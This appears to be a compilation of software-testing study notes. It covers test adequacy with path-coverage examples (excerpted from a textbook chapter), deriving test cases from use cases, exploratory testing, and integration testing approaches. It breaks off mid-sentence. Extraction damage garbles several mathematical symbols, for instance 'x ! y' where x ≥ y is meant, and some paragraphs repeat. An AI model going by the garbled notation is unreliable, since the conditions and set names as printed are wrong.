• It has a potential of missing logical errors in software. • It has a high possibility of redundant testing.

NOTE

Functional testing is more effective when the test conditions are created directly from user/business requirements. When test conditions are created from the system documentation (system requirements/ design documents), the defects in that documentation will not be detected through testing and this may be the cause of end-users’ wrath when they finally use the software.

What is non Functional Testing?

The non Functional Testing is the type of testing done against the non functional requirements. Most of the criteria are not consider in functional testing so it is used to check the readiness of a system. Non-functional requirements tend to be those that reflect the quality of the product, particularly in the context of the suitability perspective of its users. It can be started after the completion of Functional Testing. The non functional tests can be effective by using testing tools.

The testing of software attributes which are not related to any specific function or user action like performance, scalability, security or behavior of application under certain constraints.

Non functional testing has a great influence on customer and user satisfaction with the product. Non functional testing should be expressed in a testable way, not like “the system should be fast” or “the system should be easy to operate” which is not testable.

Basically in the non functional test is used to major non-functional attributes of software systems. Let’s take non functional requirements examples; in how much time does the software will take to complete a task? or how fast the response is.

What do you test in Functional Testing?

The prime objective of Functional testing is checking the functionalities of the software system. It mainly concentrates on -

• Mainline functions: Testing the main functions of an application • Basic Usability: It involves basic usability testing of the system. It checks

whether an user can freely navigate through the screens without any difficulties. • Accessibility: Checks the accessibility of the system for the user • Error Conditions: Usage of testing techniques to check for error conditions. It

checks whether suitable error messages are displayed.

Test adequacy criteria

Specifies requirements for testing

Can be used as stopping rule: stop testing if 100% of the statements have been tested

Can be used as measurement: a test set that covers 80% of the test cases is better than one which covers 70%

Can be used as test case generator: look for a test which exercises some statements not covered by the tests so far

A given test adequacy criterion and the associated test technique are opposite sides of the same coin

Test Adequacy Assessment Using

Control Flow and Data Flow

15.1. Test Adequacy: Basics

15.1.1. What is test adequacy ?

Consider a program P written to meet a set R of functional requirements. We notate such a Pand R as (P ,R). Let R contain n requirements labeled R1,R2, . . . ,Rn . Suppose now that a setT containing k tests has been constructed to test P to determine whether or not it meets all therequirements in R. Also, P has been executed against each test in T and has produced correctbehavior. We now ask: Is T good enough ? This question can be stated differently as: HasP been tested thoroughly ?, or as: Is T adequate ? Regardless of how the question is stated,it assumes importance when one wants to test P thoroughly in the hope that all errors havebeen discovered and removed when testing is declared complete and the program P declaredusable by the intended users.

In the context of software testing, the terms “thorough,” “good enough,” and “adequate,”used in the questions above, have the same meaning. We prefer the term “adequate” and thequestion Is T adequate ?. Adequacy is measured for a given test set designed to test P todetermine whether or not P meets its requirements. This measurement is done against a givencriterion C . A test set is considered adequate with respect to criterion C when it satisfies C .The determination of whether or not a test set T for program P satisfies criterion C dependson the criterion itself and is explained later in this chapter.

In this chapter we focus only on functional requirements, testing techniques to validate non-

507

508Foundations of Software Testing 15.1. Test Adequacy: Basics

functional requirements are dealt with elsewhere.

EXAMPLE 15.1. Consider the problem of writing a program named sumProduct that meetsthe following requirements:

R1 : Input two integers, say x and y, from the standard input device.

R2.1 : Find and print to the standard output device the sum of x and y if x < y .

R2.2 : Find and print to the standard output device the product of x and y if x ! y .

Suppose now that the test adequacy criterion C is specified as follows:

C : A test T for program (P ,R) is considered adequate if for each requirement r in R thereis at least one test case in T that tests the correctness of P with respect to r .

It is obvious that T = {t :< x = 2, y = 3 >} is inadequate with respect to C for programsumProduct. The lone test case t in T tests R1 and R2.1, but not R2.2.

15.1.2. Measurement of test adequacy

Adequacy of a test set is measured against a finite set of elements. Depending on the adequacycriterion of interest, these elements are derived from the requirements or from the programunder test. For each adequacy criterion C , we derive a finite set known as the coveragedomain and denoted as Ce .

A criterion C is a white-box test adequacy criterion if the corresponding coverage domainCe depends solely on program P under test. A criterion C is a black-box test adequacy criterionif the corresponding coverage domain Ce depends solely on requirements R for the programP under test. All other test adequacy criteria are of a mixed nature and not considered in thischapter. This chapter introduces several white-box test adequacy criteria that are based on theflow of control and the flow of data within the program under test.

Suppose that it is desired to measure the adequacy of T . Given that Ce has n ! 0 elements,we say that T covers Ce if for each element e ! in Ce there is at least one test case in T thattests e !. T is considered adequate with respect to C if it covers all elements in the coveragedomain. T is considered inadequate with respect to C if it covers k elements of Ce wherek < n. The fraction k/n is a measure of the extent to which T is adequate with respect to C .This fraction is also known as the coverage of T with respect to C , P , and R.

The determination of when an element e is considered tested by T depends on e and Pand is explained below through examples.

EXAMPLE 15.2. Consider the program P , test T , and adequacy criterion C of Exam-ple 15.1. In this case the finite set of elements Ce is the set {R1,R2.1,R2.2}. T covers R1

and R2.1 but not R2.2. Hence T is not adequate with respect to C . The coverage of T withrespect to C , P , and R is 0.66. Element R2.2 is not tested by T whereas the other elements ofCe are tested.

EXAMPLE 15.3. Next let us consider a different test adequacy criterion which is referred toas the path coverage criterion.

c!Aditya P. Mathur. Author’s written permission is required to make copies of any part of this book.Latest revision of this chapter: August 5, 2006

509Foundations of Software Testing Chapter 15. Test Adequacy: Control Flow and Data Flow

C : A test T for program (P ,R) is considered adequate if each path in P is traversed atleast once.

Given the requirements in Example 15.1 let us assume that P has exactly two paths, onecorresponding to condition x < y and the other to x ! y . Let us refer to these two paths as p1

and p2, respectively. For the given adequacy criterion C we obtain the coverage domain Ce tobe the set {p1, p2}.

To measure the adequacy of T of Example 15.1 against C , we execute P against each testcase in T . As T contains only one test for which x < y , only the path p1 is executed. Thus thecoverage of T with respect to C , P , and R is 0.5 and hence T is not adequate with respect toC . We also say that p2 is not tested.

In Example 15.3 we assumed that P contains exactly two paths. This assumption is basedon a knowledge of the requirements. However, when the coverage domain must contain el-ements from the code, these elements must be derived by program analysis and not by anexamination of its requirements. Errors in the program and incomplete or incorrect require-ments might cause the program, and hence the coverage domain, to be different from whatone might expect.

EXAMPLE 15.4. Consider the following program written to meet the requirements specifiedin Example 15.1; the program is obviously incorrect.

Program P15.1

1 begin

2 int x, y;3 input (x, y);4 sum=x+y;5 output (sum);6 end

The above program has exactly one path which we denote as p1. This path traverses all state-ments. Thus, to evaluate any test with respect to criterion C of Example 15.3, we obtain thecoverage domain Ce to be {p1}. It is easy to see that Ce is covered when P is executed againstthe sole test in T of Example 15.1. Thus T is adequate with respect to P even though theprogram is incorrect.

Program P15.1 has an error that is often referred to as a “missing path” or a“missing condition”error . A correct program that meets the requirements of Example 15.1 follows.

Program P15.2

1 begin

2 int x, y;3 input (x, y);4 if(x<y)5 then

6 output(x+y);


510Foundations of Software Testing 15.1. Test Adequacy: Basics

7 else

8 output(x*y);9 end

This program has two paths, one of which is traversed when x < y and the other when x ! y .Denoting these two paths by p1 and p2 we obtain the coverage domain given in Example 15.3.As mentioned earlier, test T of Example 15.1 is not adequate with respect to the path coveragecriterion.

The above example illustrates that an adequate test set might not reveal even the mostobvious error in a program. This does not diminish in any way the need for the measurement oftest adequacy. The next section explains the use of adequacy measurement as a tool for testenhancement.

15.1.3. Test enhancement using measurements of adequacy

While a test set adequate with respect to some criterion does not guarantee an error-free pro-gram, an inadequate test set is a cause for worry. Inadequacy with respect to any criterion oftenimplies deficiency. Identification of this deficiency helps in the enhancement of the inadequatetest set. Enhancement in turn is also likely to test the program in ways it has not been testedbefore such as testing untested portion, or testing the features in a sequence different fromthe one used previously. Testing the program differently than before raises the possibility ofdiscovering any uncovered errors.

EXAMPLE 15.5. Let us reexamine test T for P15.2 in Example 15.4. To make T adequatewith respect to the path coverage criterion, we need to add a test that covers p2. One test thatdoes so is {< x = 3, y = 1 >}. Adding this test to T and denoting the expanded test set by T !,we get:

T ! = {< x = 3, y = 4 >,< x = 3, y = 1 >}.

When P15.2 is excuted against the two tests in T !, both paths p1 and p2 are traversed. ThusT ! is adequate with respect to the path coverage criterion.Given a test set T for program P , test enhancement is a process that depends on the testprocess employed in the organization. For each new test added to T , P needs to be executedto determine its behavior. An erroneous behavior implies the existence of an error in P and willlikely lead to debugging of P and the eventual removal of the error. However, there are severalprocedures by which the enhancement could be carried out. One such procedure follows.

Procedure for Test Enhancement Using Measurements of Test Adequacy.

Step 1 Measure the adequacy of T with respect to the given criterion C . If T is adequate then go toStep 3, otherwise execute the next step. Note that during adequacy measurement we will beable to determine the uncovered elements of Ce .

Step 2 For each uncovered element e " Ce , do the following until e is covered or is determined to beinfeasible.


511Foundations of Software Testing Chapter 15. Test Adequacy: Control Flow and Data Flow

2.1 Construct a test t that covers e or will likely cover e.

2.2 Execute P against t .

2.2.1 If P behaves incorrectly then we have discovered the existence of an error inP . In this case t is added to T , the error is removed from P and this procedurerepeated from the beginning.

2.2.2 If P behaves correctly and e is covered then t is added to T , otherwise it isthe tester’s option whether to ignore t or to add it to T .

Step 3 Test enhancement is complete.

End of Procedure

Figure 15.1 shows a sample test construction-enhancement cycle. The cycle begins withthe construction of a non-empty set T of test cases. These tests cases are constructed from therequirements of program P under test. P is then executed against all test cases. P is correctedif it does not behave as per the requirements on any test case. The adequacy of T is measuredwith respect to a suitably selected adequacy criterion C after P is found to behave satisfactorilyon all elements of T . This construction-enhancement cycle is considered complete if T is foundadequate with respect to C . If not, then additional test cases are constructed in an attempt toremove the deficiency. The construction of these additional test cases once again makes useof the requirements that P must meet.

EXAMPLE 15.6. Consider the following program intended to compute xy given integers x

and y. For y < 0 the program skips the computation and outputs a suitable error message.

Program P15.3

1 begin

2 int x, y;3 int product, count;4 input (x, y);5 if(y#0) {6 product=1; count=y;7 while(count>0) {8 product=product*x;9 count=count-1;10 }11 output(product);12 }13 else

14 output ( “Input does not match its specification.”);15 end

Next, consider the following test adequacy criterion.


Test cases from use cases (Use Case Testing)

Use case testing is a technique that helps us identify test cases that exercise the whole system on a transaction by transaction basis from start to finish. Use case testing is a technique of deriving the test case through the use case document. We can also state that Use case testing is a technique of testing the whole system as a whole or doing the end to end testing based on transactions.

Use case testing tests with the vision of a user and not on the basis of input and output. It tests the real time transactions. Use case testing is a technique of deriving the test case through the use case document. We can also state that Use case testing is a technique of testing the whole system as a whole or doing the end to end testing based on transactions.

Use case testing tests with the vision of a user and not on the basis of input and output. It tests the real time transactions.

• A use case is a description of a particular use of the system by an actor (a user of the system). Each use case describes the interactions the actor has with the system in order to achieve a specific task (or, at least, produce something of value to the user).

• Actors are generally people but they may also be other systems. • Use cases are a sequence of steps that describe the interactions between the

actor and the system. Use cases are defined in terms of the actor, not the system, describing what the actor does and what the actor sees rather than what inputs the system expects and what the system’s outputs.

• Usecases use the business language rather than technical terms. • Each usecase must specify any preconditions that need to be met for the use

case to work. Use cases must also specify post conditions that are observable results and a description of the final state of the system after the use case has been executed successfully.

• They often use the language and terms of the business rather than technical terms, especially when the actor is a business user.

• They serve as the foundation for developing test cases mostly at the system and acceptance testing levels.

• Use cases can uncover integration defects, that is, defects caused by the incorrect interaction between different components. Used in this way, the actor may be something that the system interfaces to such as a communication link or sub-system.

• Use cases describe the process flows through a system based on its most likely use. This makes the test cases derived from use cases particularly good for

finding defects in the real-world use of the system (i.e. the defects that the users are most likely to come across when first using the system).

• Each use case usually has a mainstream (or most likely) scenario and sometimes additional alternative branches (covering, for example, special cases or exceptional conditions).

• Each use case must specify any preconditions that need to be met for the use case to work.

• Use cases must also specify post conditions that are observable results and a description of the final state of the system after the use case has been executed successfully.

The ATM PIN example is shown below in Figure 4.3. We show successful and unsuccessful scenarios. In this diagram we can see the interactions between the A (actor – in this case it is a human being) and S (system). From step 1 to step 5 that is success scenario it shows that the card and pin both got validated and allows Actor to access the account. But in extensions there can be three other cases that is 2a, 4a, 4b which is shown in the diagram below.

For use case testing, we would have a test of the success scenario and one testing for each extension. In this example, we may give extension 4b a higher priority than 4a from a security point of view.

System requirements can also be specified as a set of use cases. This approach can make it easier to involve the users in the requirements gathering and definition process.

what is a UseCase

1. A Usecase is a description of a particular use of the system by the end user of the system.

http://istqbexamcertification.com/wp-content/uploads/2011/12/Use-case-testing-example2.jpg

2. Usecases are a sequence of steps that describe the interactions between the user and the software system.

3. Each usecase describes the interactions the end user has with the software system in order to achieve a specific task.

What is Use Case Testing?

Use Case Testing is a functional black box testing technique that helps testers to identify test scenarios that exercise the whole system on each transaction basis from start to finish.

Characteristics of Use Case Testing:

• Use Cases capture the interactions between 'actors' and the 'system'. • 'Actors' represents user and their interactions that each user takes part into. • Test cases based on use cases and are referred as scenarios. • Capability to identify gaps in the system which would not be found by testing

individual components in isolation. • Very effective in defining the scope of acceptance tests.

Example:

The Below example clearly shows the interaction between users and possible actions.

Deriving test cases from use cases:

A four step processes

1. Identify the use case scenarios

2. For each scenario, identify one or more test cases

3. For each test case, identify the conditions that will cause it to execute.

4. Complete the test case by adding data values

Generating Test Cases From Use Cases Usually software testing accounts for 30 to 50 percent of software development costs. This because first, testing software is a very difficult; and second, testing is typically done without a clear methodology. It is best to start testing as early in the software development process as possible. Delaying the start of testing activities until all development is done is a high-risk approach. If significant bugs are found at this late stage (and they usually are), then schedules often slip. Haphazard methods of designing, organizing, and implementing testing activities also frequently lead to less-than-adequate test coverage.

So how do we use requirements (use cases) to generate test cases?

In software development, use cases define system software requirements. Use case development begins early on, so real use cases for key product functionality are available fairly early in the project. A use case fully describes a sequence of actions performed by a system to provide an observable result of value to a person or another system. Use cases tell the customer what to expect, the developer what to code, the technical writer what to document, and the tester what to test. For software testing, creation of test cases is the first step. Then test scripts (collections of test cases) are designed for these test cases, and finally, a test suite/plan is created to implement everything.

Test case (TC) A set of test inputs, executions, and expected results developed for a particular objective.

Test Script/Procedure. A document, providing detailed instructions for the [manual] execution of one or more test cases.

Test suite. A collection of test scripts or test cases that is used for validating bug fixes (or finding new bugs) within a logical or physical area of a product

Test cases are key to the process because they identify and communicate the conditions that will be implemented in test and are necessary to verify successful and acceptable implementation of the requirements. Although few actually do it, developers can begin creating test cases as soon as use cases are available, well before any code is written.

Use cases are based on the Unified Modeling Language (UML) and can be visually represented in use-case diagrams.

The ovals represent use cases, and the stick figures represent "actors," which can be either humans or other systems. The lines represent communication between an actor and a use case. As you can see, this use case diagram provides the big picture: Each use case represents a big chunk of functionality that will be implemented, and each actor represents someone or something outside our system that interacts with it. Each use case also requires a significant amount of text to describe it. This text is usually formatted in sections

Use Case Section Description

Name An appropriate name for the use case

Brief Description A brief description of the use case’s role and purpose.

Flow of Events A textual description of what the system does with regard to the use case (not how specific problems are solved by the system). The description should be understandable to the customer.

Special Requirements A textual description that collects all requirements, such as non-functional requirements, on the use case, that are not considered in the use-case model, but that need to be taken care of during design or implementation.

Preconditions A textual description that defines any constraints on the system at the time the use case may start.

Post conditions A textual description that defines any constraints on the system at the time the use case will terminate.

The most important part of a use case for generating test cases is the flow of events. The two main parts of the flow of events are the basic flow of events and the alternate flows of events. The basic flow of events should cover what "normally" happens when the use case is performed. The alternate flows of events covers behaviour of an optional or exceptional character relative to normal behaviour, and also variations of the normal behaviour. You can think of the alternate flows of events as "detours" from the basic flow of events.

The straight arrow represents the basic flow of events, and the curves represent alternate flows. Note that some alternate flows return to the basic flow of events, while others end the use case. Both the basic flow of events and the alternative flows should be further structured into steps or subflows

Register For Courses

Basic Flow

1. Logon This use case starts when a Student accesses the University Web site. The system asks for, and the Student enters, the student ID and password. 2. Select 'Create a Schedule' The system displays the functions available to the student. The student selects "Create a Schedule." 3. Obtain Course Information The system retrieves a list of available course offerings from the Course Catalogue System and displays the list to the Student. 4. Select Courses The Student selects four primary course offerings and two alternate course offerings from the list of available course offerings. 5. Submit Schedule

The student indicates that the schedule is complete. For each selected course offering on the schedule, the system verifies that the Student has the necessary prerequisites. 6. Display Completed Schedule The system displays the schedule containing the selected course offerings for the Student and the confirmation number for the schedule.

Alternate Flows

1. Unidentified Student In Step 1 of the Basic Flow, Logon, if the system determines that the student ID and/or password is not valid, an error message is displayed. 2. Quit The Course Registration System allows the student to quit at any time during the use case. The Student may choose to save a partial schedule before quitting. All courses that are not marked as "enrolled in" are marked as "selected" in the schedule. The schedule is saved in the system. The use case ends. 3. Unfulfilled Prerequisites, Course Full, or Schedule Conflicts In Step 5 of the Basic Flow, Submit Schedule, if the system determines that prerequisites for a selected course are not satisfied, that the course is full, or that there are schedule conflicts, the system will not enroll the student in the course. A message is displayed that the student can select a different course. The use case continues at Step 4, Select Courses, in the basic flow. 4. Course Catalog System Unavailable In Step 3 of the Basic Flow, Obtain Course Information, if the system is down, a message is displayed and the use case ends. 5. Course Registration Closed If, when the use case starts, it is determined that registration has been closed, a message is displayed, and the use case ends. As you can see, a significant amount of detail goes into fully specifying a use case. Ideally, the flows should be written as "dialogs" between the system and the actors. Each step should explain what the actor does and what the system does in response; it should also be numbered and have a title. Alternate flows always specify where they start in the basic flow and where they go when they end.

Use-Case Scenarios

There is one more thing to describe before use cases can be used to generate test cases: a use-case scenario. A use-case scenario is an instance of a use case, or a complete "path" through the use case. End users of the completed system can go down many paths as they execute the functionality specified in the use case. Following the basic flow would be one scenario. Following the basic flow plus alternate flow 1A would be another. The basic flow plus alternate flow 2A would be a third, and so on. All possible scenarios for the diagram shown below beginning with the basic flow and then combining the basic flow with alternate flows.

Scenario 1 Basic Flow

Scenario 2 Basic Flow Alternate 1

Scenario 3 Basic Flow Alternate 1 Alternate 2



Scenario 6 Basic Flow Alternate 3 Alternate 1 Alternate 2



These scenarios will be used as the basis for creating test cases.

Generating Test Cases A test case is a set of test inputs, execution conditions, and expected results developed to verify compliance with a specific requirement, for example. The purpose of a test case is to identify conditions that will be implemented in test. Test cases are necessary to verify successful and acceptable implementation of the requirements (use cases). There is a three-step process for generating test cases from a fully detailed use case:

1. For each use case, generate a full set of use-case scenarios. 2. For each scenario, identify at least one test case and the conditions

that will make it "execute."

3. For each test case, identify the data values with which to test.

Step One: Generate Scenarios

Read the use-case textual description and identify each combination of main and alternate flows -- the scenarios -- and create a scenario matrix.

Scenario Name Starting Flow Alternate

Scenario 1 - Successful registration Basic Flow

Scenario 2 - Unidentified student Basic Flow A1

Scenario 3 - User quits Basic Flow A2

Scenario 4 - Course catalog system unavailable

Basic Flow A4

Scenario 5 - Registration closed Basic Flow A5

Scenario 6 – Cannot enroll Basic Flow A3

Step Two: Identify Test Cases

Once the full set of scenarios has been identified, the next step is to identify the test cases. You do this by analyzing the scenarios and reviewing the use case textual description as well. There should be at least one test case for each scenario, but there will probably be more. For example, if the textual description for an alternate flow is written in a very cursory way, like the description below, 3A. Unfulfilled Prerequisites, Course Full, or Schedule Conflicts then additional test cases may be required to test all the possibilities. In addition, we may wish to add test cases to test boundary conditions. The next step in fleshing out the test cases is to reread the use-case textual description and find the conditions or data elements required to execute the various scenarios. For the Register for Course use case, conditions would be student ID, password, courses selected, etc.

Step Three: Identify Data Values to Test

Once all of the test cases have been identified, they should be reviewed and checked to ensure accuracy and to identify redundant or missing test cases. Nest step is to identify actual data values. Without test data, test cases (or test procedures) can't be implemented or executed; they are just descriptions of conditions, scenarios, and paths. Therefore, it is necessary to identify actual values to be used in implementing the final tests.

Putting It All Together

Generally use cases are associated with the front end of the software development lifecycle and test cases are typically associated with the latter part of the lifecycle. By using use cases to generate test cases testing teams can get started much earlier in the lifecycle, allowing them to identify and repair defects that would be very costly to fix later, ship on time, and ensure that the system will work reliably.

Exploratory testing

• As its name implies, exploratory testing is about exploring, finding out about the software, what it does, what it doesn’t do, what works and what doesn’t work. The tester is constantly making decisions about what to test next and where to spend the (limited) time. This is an approach that is most useful when there are no or poor specifications and when time is severely limited.

• Exploratory testing is a hands-on approach in which testers are involved in minimum planning and maximum test execution.

• The planning involves the creation of a test charter, a short declaration of the scope of a short (1 to 2 hour) time-boxed test effort, the objectives and possible approaches to be used.

• The test design and test execution activities are performed in parallel typically without formally documenting the test conditions, test cases or test scripts. This does not mean that other, more formal testing techniques will not be used. For example, the tester may decide to us boundary value analysis but will think through and test the most important boundary values without necessarily writing them down. Some notes will be written during the exploratory-testing session, so that a report can be produced afterwards.

• Test logging is undertaken as test execution is performed, documenting the key aspects of what is tested, any defects found and any thoughts about possible further testing.

• It can also serve to complement other, more formal testing, helping to establish greater confidence in the software. In this way, exploratory testing can be used as a check on the formal test process by helping to ensure that the most serious defects have been found.

Exploratory testing definition

“Exploratory Testing is a testing approach that allows you to apply your ability and skill as a tester in a powerful way.” Testers have to understand the application first by exploring the application and based on this understand they should come up with the test scenarios. After that start actual testing of application.

Exploratory testing is simultaneous learning, test design, and test execution.

Key tips to remember in Exploratory testing techniques:

• Preparation of test scenarios validates the software stability. • Exhaustively testing of the software based on the identified requirements. • Find out the requirements as well as functionality of the software application. • Find out the limitation of the software application. • Identify the scope of the project.

In this type of testing the testers have to do minimum effort for planning but maximum execution cover so that tester gets exact functionality of application. This can be helpful for tester to decide what can be next to test. During testing the tester learns about behavior of the software application, start creating test plan or test scenarios. There are different exploratory testing tools in the market. One of the Exploratory testing tool is “Session Tester” that can be used as for managing and recording Session-Based Testing. The creation of test scenarios is totally based on the experience and learning of application under test.

In this type of testing tester have freedom in testing. The finding bug is not only depends on experience of tester but also on the skill of the tester.

Many of testers are thinking of when this type of testing is comes in the picture, so here are points when we can use the exploratory testing:

• When you don’t have a requirement or testing document or minimal documents. • When you want to complete your application testing in short period of time • When you have to test the application in the early stage of SDLC

Usage

Exploratory testing is particularly suitable if requirements and specifications are incomplete, or if there is lack of time. The approach can also be used to verify that previous testing has found the most important defects.

http://www.softwaretestingclass.com/software-testing-tools-list/

http://en.wikipedia.org/wiki/Software_requirement

http://en.wikipedia.org/wiki/Program_specification

What is an Exploratory Testing?

During testing phase where there is severe time pressure, Exploratory testing technique is adopted that combines the experience of testers along with a structured approach to testing.

Exploratory testing often performed as a black box testing technique, the tester learns things that together with experience and creativity generate new good tests to run.

As the name suggests exploratory testing is about exploring more into the software and finding about the software.

In exploratory testing tester focuses more on how the software actually works, testers do minimum planning and maximum execution of the software by which they get in depth idea about the software functionality, once the tester starts getting insight into the software he can make decisions to what to test next.

As per Cem Kaner exploratory testing is “a style of software testing that emphasizes the personal freedom and responsibility of the individual tester to continually optimize the quality of his/her work by treating test-related learning, test design, test execution, and

test result interpretation as mutually supportive activities that run in parallel throughout the project.”

Exploratory Testing is mostly performed by skilled testers.

Exploratory testing is mostly used if the requirements are incomplete and time to release the software is less.

Exploratory testing -

• Is not random testing but it is adhoc testing with purpose of find bugs • Is structured and rigorous

• Is cognitively (thinking) structured as compared to procedural structure of scripted testing. This structure comes from Charter, time boxing etc.

• Is highly teachable and manageable • Is not a technique but it is an approach. What actions you perform next is

governed by what you are doing currently

Exploratory Test Preparation:

Exploratory test preparation goes through following 5 stages detailed below and it is also called session based test management (SBTM Cycle):

1. Create a Bug Taxonomy (classification ) o Categorize common types of faults found in the past projects o Analyze the root cause analysis of the problems or faults o Find the risks and develop ideas to test the application.

2. Test Charter o Test Charter should suggest

1. what to test 2. how it can be tested 3. What needs to be looked

o Test ideas are the starting point of exploration testing o Test charter helps determine how the end user could use the system

3. Time Box o This method includes pair of testers working together not less than 90

minutes o There should not be any interrupted time in those 90 minutes session o Time box can be extended or reduced by 45 minutes o This session encourages testers to react on the response from the system

and prepare for the correct outcome 4. Review Results:

o Evaluation of the defects o Learning from the testing o Analysis of coverage areas

5. Debriefing: o Compilation of the output results o Compare the results with the charter o Check whether any additional testing is needed

During exploratory execution, following needs to be done:

• Mission of testing should be very clear • Keep notes on what needs to be tested, why it needs to be tested and the

assessment of the product quality • Tracking of questions and issues raised during exploratory testing • Better to pair up the testers for effective testing

http://www.guru99.com/test-management.html

• The more we test, more likely to execute right test cases for the required scenarios

It is very important to take document and monitor the following

• Test Coverage - Whether we have taken notes on the coverage of test cases and improve the quality of the software

• Risks - Which risks needs to be covered and which are all important ones? • Test Execution Log - Recordings on the test execution • Issues / Queries - Take notes on the question and issues on the system

Smarter exploratory testing finds more errors in less time.

Advantages

• It doesn’t require preparation for testing as we don’t have documents for testing. • In this type of testing time saves due to all task are doing simultaneously like

Testing, Designing test scenarios and executing test scenarios. • Tester can report many issues due to incomplete requirement or missing

requirement document.

Disadvantages

• Few issues cannot be catch in this type of testing. • There is review of test planning & designing of test cases/scenario while testing

may cause issues. • Testers have to remember the scenario what he is executing because if any bug

is found then tester should report a bug with proper steps to reproduce Difficulty to perform the exact manner especially for new found bugs.

Benefits:

Following are the benefits of Exploratory Testing:

• Exploratory testing takes less preparation. • Critical defects are found very quickly. • The testers can use reasoning based approach on the results of previous results

to guide their future testing on the fly.

Drawbacks:

Following are the Drawbacks of Exploratory Testing:

• Tests cannot be reviewed. • It is difficult to keep track of what tests have been tested.

• It is unlikely to be performed in exactly the same manner and to repeat specific details of the earlier tests.

Challenges of Exploratory Testing:

There are many challenges of exploratory testing and those are explained below:

• Learning to use the application or software system is a challenge • Replication of failure is difficult • Determining whether tools need to be used can be challenging • Determine the best test cases to execute can be difficult • Reporting of the test results is challenge as report doesn't have planned scripts

or cases to compare with the actual result or outcome • Documentation of all events during execution is difficult to record • Don't know when to stop the testing as exploratory testing has definite test cases

to execute.

When to use exploratory testing?

Exploratory testing can be used extensively when

• The testing team has experienced testers • Early iteration is required • There is a critical application • New testers entered into the team

Integration testing

DEFINITION

Integration Testing is a level of the software testing process where individual units are combined and tested as a group.

The purpose of this level of testing is to expose faults in the interaction between integrated units.

Test drivers and test stubs are used to assist in Integration Testing.

Note: The definition of a unit is debatable and it could mean any of the following:

1. the smallest testable part of a software 2. a ‘module’ which could consist of many of ‘1’ 3. a ‘component’ which could consist of many of ‘2’

Need of Integration Testing:

Although each software module is unit tested, defects still exist for various reasons like

• A Module in general is designed by an individual software developer who understanding and programming logic may differ from other programmers. Integration testing becomes necessary to verify the software modules work in unity

• At the time of module development, there wide chances of change in requirements by the clients. These new requirements may not be unit tested and hence integration testing becomes necessary.

• Interfaces of the software modules with the database could be erroneous • External Hardware interfaces, if any, could be erroneous • Inadequate exception handling could cause issues.

TASKS

• Integration Test Plan o Prepare o Review o Rework o Baseline

• Integration Test Cases/Scripts o Prepare o Review o Rework o Baseline

• Integration Test o Perform

When is Integration Testing performed?

Integration Testing is performed after Unit Testing and before System Testing.

Who performs Integration Testing?

Either Developers themselves or independent Testers perform Integration Testing.

Definition by ISTQB

• integration testing: Testing performed to expose defects in the interfaces and in the interactions between integrated components or systems. See also component integration testing, system integration testing.

• component integration testing: Testing performed to expose defects in the interfaces and interaction between integrated components.

• system integration testing: Testing the integration of systems and packages; testing interfaces to external organizations (e.g. Electronic Data Interchange, Internet).

http://softwaretestingfundamentals.com/unit-testing/


• Integration testing tests integration or interfaces between components, interactions to different parts of the system such as an operating system, file system and hardware or interfaces between systems.

• Also after integrating two different components together we do the integration testing. As displayed in the image below when two different modules ‘Module A’ and ‘Module B’ are integrated then the integration testing is done.

• Integration testing is done by a specific integration tester or test team. • Integration testing follows two approach known as ‘Top Down’ approach and

‘Bottom Up’ approach as shown in the image below:

APPROACHES

• Big Bang is an approach to Integration Testing where all or most of the units are combined together and tested at one go. This approach is taken when the testing team receives the entire software in a bundle. So what is the difference between Big Bang Integration Testing and System Testing? Well, the former tests only the interactions between the units while the latter tests the entire system.

• Top Down is an approach to Integration Testing where top level units are tested first and lower level units are tested step by step after that. This approach is taken when top down development approach is followed. Test Stubs are needed to simulate lower level units which may not be available during the initial phases.

• Bottom Up is an approach to Integration Testing where bottom level units are tested first and upper level units step by step after that. This approach is taken when bottom up development approach is followed. Test Drivers are needed to simulate higher level units which may not be available during the initial phases.

• Sandwich/Hybrid is an approach to Integration Testing which is a combination of Top Down and Bottom Up approaches.

http://istqbexamcertification.com/wp-content/uploads/2014/09/Integration_testing.jpg

Below are the integration testing techniques:

1. Big Bang integration testing:

In Big Bang integration testing all components or modules are integrated simultaneously, after which everything is tested as a whole. As per the below image all the modules from ‘Module 1′ to ‘Module 6′ are integrated simultaneously then the testing

is carried out.

Big Bang Integration Testing is an integration testing strategy wherein all units are linked at once, resulting in a complete system. When this type of testing strategy is adopted, it is difficult to isolate any errors found, because attention is not paid to verifying the interfaces across individual units.

Big Bang Integration - WorkFlow Diagram

Big Bang Testing is represented by the following workflow diagram:

http://istqbexamcertification.com/wp-content/uploads/2012/01/What-is-big-bang-integration-testing1.jpg

Advantage: Big Bang testing has the advantage that everything is finished before integration testing starts.

• Convenient for small systems.

Disadvantage: The major disadvantage is that in general it is time consuming and difficult to trace the cause of failures because of this late integration.

• Defects present at the interfaces of components are identified at very late stage as all components are integrated in one shot.

• It is very difficult to isolate the defects found. • There is high probability of missing some critical defects, which might pop up in

the production environment. • It is very difficult to cover all the cases for integration testing without missing even

a single scenario. • Fault Localization is difficult. • Given the sheer number of interfaces that need to be tested in this approach,

some interfaces links to be tested could be missed easily. • Since the integration testing can commence only after "all" the modules are

designed, testing team will have less time for execution in the testing phase. • Since all modules are tested at once, high risk critical modules are not isolated

and tested on priority. Peripheral modules which deal with user interfaces are also not isolated and tested on priority.

Incremental Approach:

In this approach, testing is done by joining two or more modules that are logically related. Then the other related modules are added and tested for the proper functioning. Process continues until all of the modules are joined and tested successfully.

This process is carried out by using dummy programs called Stubs and Drivers. Stubs and Drivers do not implement the entire programming logic of the software module but just simulate data communication with the calling module.

Stub: Is called by the Module under Test.

Driver: Calls the Module to be tested.

Incremental Approach in turn is carried out by two different Methods:

• Bottom Up • Top Down

2. Top-down integration testing: Testing takes place from top to bottom, following the control flow or architectural structure (e.g. starting from the GUI or main menu). Components or systems are substituted by stubs. Below is the diagram of ‘Top down Approach’:

Top-down integration testing is an integration testing technique used in order to simulate the behavior of the lower-level modules that are not yet integrated. Stubs are the modules that act as temporary replacement for a called module and give the same output as that of the actual product.

In this approach, testing is done by joining two or more modules that are logically related. Then the other related modules are added and tested for the proper functioning. Process continues until all of the modules are joined and tested successfully.

This process is carried out by using dummy programs called Stubs and Drivers. Stubs and Drivers do not implement the entire programming logic of the software module but just simulate data communication with the calling module.

Stub: Is called by the Module under Test.

Driver: Calls the Module to be tested.

Stub - Flow Diagram:

The above diagrams clearly states that Modules 1, 2 and 3 are available for integration, whereas, below modules are still under development that cannot be integrated at this point of time. Hence, Stubs are used to test the modules. The order of Integration will be:

